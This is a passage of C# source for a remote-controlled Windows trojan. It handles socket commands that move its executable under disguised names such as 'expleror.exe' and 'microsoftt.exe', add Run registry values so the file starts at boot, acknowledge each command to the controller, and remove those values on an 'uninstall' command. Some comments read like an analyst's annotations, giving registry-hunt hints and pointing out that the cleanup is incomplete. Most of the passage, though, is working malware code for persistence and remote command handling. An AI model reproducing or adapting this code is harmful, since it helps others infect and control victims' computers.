key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//______________________________________________________________________
//=======================================================================
if(ss=="mw0010")
{
try{file.move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("expleror","c:\\winnt\\system\\expleror.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
// This branch writes the path without the ".exe" suffix, unlike the branch above;
// a registry hunt for the "expleror" value should match both spellings of the data.
key2.setvalue("expleror","c:\\winnt\\system\\expleror");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//===================================================================
//*******************************************************************
if(ss=="mw0001")
{
try{file.move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("expleror","c:\\winnt\\system\\expleror.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
// Same suffix-less path as in the "mw0010" fallback.
key2.setvalue("expleror","c:\\winnt\\system\\expleror");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//*************************************************************************
//################################## end of the relocation section ##########################
//·················· trojan uninstall section starts below ·················
// "xz0000" deletes the three Run values only. In the code shown it does not delete
// the executable, stop the listener or touch the policy values, so it is not a full
// cleanup of an affected host.
if(ss=="xz0000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
try{key1.deletevalue("expleror");}
catch{}
try{key1.deletevalue("msdoss");}
catch{}
try{key1.deletevalue("microsoftt");}
catch{}
key1.close();
}
catch{}
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//·················· end of the trojan uninstall section ·················
}//socket
//
// todo: add any constructor code after initializecomponent call
//
}//targett
/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void dispose( bool disposing )
{
    // Managed children are released only on an explicit dispose call and only when
    // the designer container was actually created.
    bool releasecomponents = disposing && components != null;
    if (releasecomponents)
    {
        components.dispose();
    }
    // The base class cleanup runs in every case.
    base.dispose(disposing);
}
#region windows form designer generated code
/// <summary>
/// 设计器支持所需的方法 – 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
// Designer-generated setup for the form: sizes, name, caption and the load handler.
// Nothing here touches the network or the registry; the listener is started by the
// constructor after this method returns.
private void initializecomponent()
{
//
// form1
//
this.autoscalebasesize = new system.drawing.size(6, 14);
this.clientsize = new system.drawing.size(292, 266);
this.name = "form1";
// The caption is left at the designer default "form1".
this.text = "form1";
// form1_load is wired up here; its body is empty in this listing.
this.load += new system.eventhandler(this.form1_load);
}
#endregion
/// <summary>
/// 应用程序的主入口点。
/// </summary>
[stathread]
static void main()
{
    // Constructing form1 is what opens the listener and starts the command thread;
    // the message loop then runs on that form.
    form1 mainform = new form1();
    application.run(mainform);
}
private void form1_load(object sender, system.eventargs e)
{
    // Intentionally empty: the handler is registered in initializecomponent but does no work.
    return;
}
}
}
